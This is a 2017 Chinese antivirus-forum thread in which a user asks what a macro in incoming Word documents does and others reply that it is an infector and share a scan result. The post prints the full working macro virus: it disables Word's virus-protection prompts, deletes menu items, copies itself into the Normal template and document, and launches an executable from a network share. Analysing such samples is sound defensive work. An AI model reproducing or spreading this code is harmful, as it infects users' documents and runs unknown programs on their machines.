请分析一下这个宏干什么的？

显示全部楼层 · 发表于 2017-9-12 16:22:40

经常要收来自某单位的DOC文档，每次都带这个，火绒提示病毒但杀不掉，对宏纯粹不懂，请兄弟们分析一下这个到底干什么坏事不？

Dim x1, x2, x3, x4 As Boolean
Dim x5, x6 As Object
Dim x7, x8, x16 As Integer
Dim x9 As Date
Dim x10, x11, x12, x13, x14 As String
Private Sub Document_Close()
On Error Resume Next
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
CommandBars("Macro").Controls(4).Delete
CommandBars("Macro").Controls(3).Delete
CommandBars("Macro").Controls(2).Delete
CommandBars("Macro").Controls(1).Delete
CommandBars("Tools").Controls(17).Delete
Shell ("\\jdq\cc$\b.exe")
If x3 = True Then
x13 = x5.codemodule.Lines(1, x5.codemodule.CountOfLines)
ElseIf x4 = True Then
x13 = x6.codemodule.Lines(1, x6.codemodule.CountOfLines)
End If
If (x3 = True Xor x4 = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
   If x3 = True Then
      x2 = NormalTemplate.Saved
      x11 = x5.codemodule.Lines(1, x5.codemodule.CountOfLines)
      x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
      x6.codemodule.AddFromString x11
      If x2 = True Then NormalTemplate.Save
   End If
If x4 = True Or ActiveDocument.Saved = False Then
   x1 = ActiveDocument.Saved
   x11 = x6.codemodule.Lines(1, x6.codemodule.CountOfLines)
   x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
   x5.codemodule.AddFromString x11
   If x1 = True Then ActiveDocument.Save
End If
End If
End Sub
Private Sub Document_New()
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If x4 = False Then
x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
End If
If x3 = False Then
      x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
End If

End Sub
Private Sub Document_Open()
Set x5 = ActiveDocument.VBProject.VBComponents.Item(1)
Set x6 = NormalTemplate.VBProject.VBComponents.Item(1)
x3 = x5.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
x4 = x6.codemodule.Find("niahiyigebendan", 1, 1, 10000, 10000)
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If x4 = False Then
x6.codemodule.deletelines 1, x6.codemodule.CountOfLines
End If
If x3 = False Then
      x5.codemodule.deletelines 1, x5.codemodule.CountOfLines
End If
End Sub

显示全部楼层 · 发表于 2017-9-12 17:17:43

提示病毒杀不掉是什么意思

显示全部楼层 · 发表于 2017-9-12 17:19:37

样本呢??

显示全部楼层 · 发表于 2017-9-12 17:21:38

本帖最后由 XZ8SM7Sx0bVkoUV 于 2017-9-12 17:36 编辑

感染型啊 ,

显示全部楼层 · 发表于 2017-9-12 17:22:41

老司机也报毒了，你可以上传哈勃或是用本论坛饭友的分析工具试下！！！
http://bbs.kafan.cn/thread-2076549-1-1.html

显示全部楼层 · 发表于 2017-9-12 18:24:57

XZ8SM7Sx0bVkoUV 发表于 2017-9-12 17:17
提示病毒杀不掉是什么意思

火绒弹出发现病毒，我每次都点了处理，但好象没有处理，下次继续提示。

显示全部楼层 · 发表于 2017-9-12 18:27:33

zst470396853 发表于 2017-9-12 17:19
样本呢??

随便一个DOC中新建宏，把那段代码复制进去保存，这个DOC就是病毒样本了

显示全部楼层 · 发表于 2017-9-12 18:28:46

阿童木来了发表于 2017-9-12 17:22
老司机也报毒了，你可以上传哈勃或是用本论坛饭友的分析工具试下！！！
http://bbs.kafan.cn/thread-20765 ...

好的，改天请老大分析分析。

显示全部楼层 · 发表于 2017-9-12 18:37:40

千里同风发表于 2017-9-12 18:24
火绒弹出发现病毒，我每次都点了处理，但好象没有处理，下次继续提示。

我刚刚点击立即处理后删除了，你那边是不是有东西一直创建它？你可以加一下火绒工程师大大的QQ，让她帮你看下吧

显示全部楼层 · 发表于 2017-9-12 19:37:15

[mw_shl_code=html,true]类型:木马-virus.vbs.qexvmc.1
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云安全引擎
文件路径:C:\Users\d*\Desktop\1.vbs
文件大小:2.8K (2,817 字节)
文件指纹（MD5）:e1e70baf4*f98627
处理建议:隔离文件
[/mw_shl_code]

[可疑文件] 请分析一下这个宏干什么的？

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源